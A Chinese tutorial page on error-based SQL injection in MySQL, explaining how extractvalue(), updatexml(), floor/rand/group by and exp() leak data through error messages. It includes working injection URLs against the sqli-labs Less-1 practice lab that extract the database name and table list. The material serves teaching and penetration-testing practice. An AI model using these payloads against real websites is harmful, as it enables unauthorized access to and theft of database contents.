SQL注入教程之报错注入（sql注入的报错函数）这样也行？

🌐 经济型：买域名、轻量云服务器、用途：游戏网站等《腾讯云》特点：特价机便宜适合初学者用点我优惠购买

🚀 拓展型：买域名、轻量云服务器、用途：游戏网站等《阿里云》特点：中档服务器便宜域名备案事多点我优惠购买

🛡️ 稳定型：买域名、轻量云服务器、用途：游戏网站等《西部数码》特点：比上两家略贵但是稳定性超好事也少点我优惠购买

文章摘要

这篇文章介绍了SQL报错注入（SQL injection by errors）的技术原理及其应用。通过构造特定的SQL语句，攻击者可以利用页面错误提示功能，提取数据库信息（如名称、版本号、用户名等），从而实现“暴库”（expose database）、“暴表”（expose tables）等攻击目标。文章详细讲解了以下错误函数的作用及其原理：1. **extractvalue()**：用于在XML文档中查找特定字符位置，错误报告为“XPATH syntax error”。2. **updatexml()**：用于修改XML文档中的数据，错误同样报告为“XPATH syntax error”。3. **floor()、rand()、count()、group by**：这些函数在使用时可能导致主键重复，从而引发错误。4. **exp()**：在参数超过710时会报错。文章还通过实例展示了攻击者如何利用上述错误函数进行SQL注入攻击，例如：- 暴库攻击：`http://127.0.0.1/sqli/Less-1/?id=1' and extractvalue(1,concat('~',database()))`- 暴表攻击：`http://127.0.0.1/sqli/Less-1/?id=1' and updatexml(1,concat('~',group_concat(table_name)),1)` 攻击者通过构造错误的SQL语句，迫使系统返回数据库信息，从而达到攻击目标。总结而言，文章通过技术分析和实例演示，展示了SQL报错注入的常见技术及其应用场景。

目录SQL报错注入概述报错注入的前提条件Xpath类型函数extractvalue()updatexml()其他函数floor()、rand()、count()、group by联用exp()（5.5.5<=MySQL数据库版本号<=5.5.49）MySQL数据库报错功能函数总汇报错注入实例extractvalue()暴库暴表updatexml()暴库暴表总结

通过构造特定的SQL语句，让攻击者想要查询的信息（如数据库名、版本号、用户名等）通过页面面的错误提示回显出来。

Web应用程序未关闭数据库报错函数，对于一些SQL语句的错误直接回显在页面上后台未对一些具有报错功能的函数（如extractvalue、updatexml等）进行过滤

作用：对XML文档进行查询，相当于在HTML文件中用标签查找元素。

语法: extractvalue( XML_document, XPath_string )

参数1：XML_document是String格式，为XML文档对象的名称参数2：XPath_string(Xpath格式的字符串)，注入时可操作的地方

报错原理：xml文档中查找字符位置是用/xxx/xxx/xxx/…这种格式，如果写入其他格式就会报错，并且会返回写入的非法格式内容，错误信息如：XPATH syntax error:’xxxxxxxx‘

作用：改变文档中符合条件的节点的值。

语法: updatexml( XML_document, XPath_string, new_value )

参数1：XML_document是String格式，为XML文档对象的名称参数2：XPath_string(Xpath格式的字符串)，注入时可操作的地方参数3：new_value，String格式，替换查找到的符合条件的数据

报错原理:同extractvalue()

作用

floor(x)：对参数x向下取整

rand()：生成一个0～1之间的随机浮点数

count(*)：统计某个表下总共有多少条记录

group by x: 按照 (by) 一定的规则（x）进行分组

报错原理：group by与rand()使用时，如果临时表中没有该主键，则在插入前会再计算一次rand()，然后再由group by将计算出来的主键直接插入到临时表格中，导致主键重复报错

作用：计算以e（自然常数）为底的幂值

语法: exp(x)

报错原理：当参数x超过710时，exp()函数会报错，错误信息如：DOUBLE value is of range:

依然用sqli/Less-1

直接用报错函数进行暴库操作

暴库

http://127.0.0.1/sqli/Less-1/?id=1′ and extractvalue(1,concat(‘~’,database())) –+

暴表

http://127.0.0.1/sqli/Less-1/?id=1′ and extractvalue(1,concat(‘~’,(select group_concat(table_name) from information_schema.tables where table_schema=’security’))) –+

后面的步骤大致相同，不再演示

暴库

http://127.0.0.1/sqli/Less-1/?id=1′ and updatexml(1,concat(‘~’,database()),1) –+

暴表

http://127.0.0.1/sqli/Less-1/?id=1′ and updatexml(1,concat(‘~’,(select group_concat(table_name) from information_schema.tables where table_schema=’security’)),1) –+

到此这篇关于SQL注入教程之报错注入的文章就介绍到这了,更多相关SQL报错注入内容请搜索脚本之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持脚本之家！

您可能感兴趣的文章:SQL注入报错注入函数图文详解SQL注入篇学习之盲注/宽字节注入简单聊聊SQL注入的原理以及一般步骤SQL注入渗透测试以及护网面试题和解答总结如何有效防止sql注入的方法SQL堆叠注入简介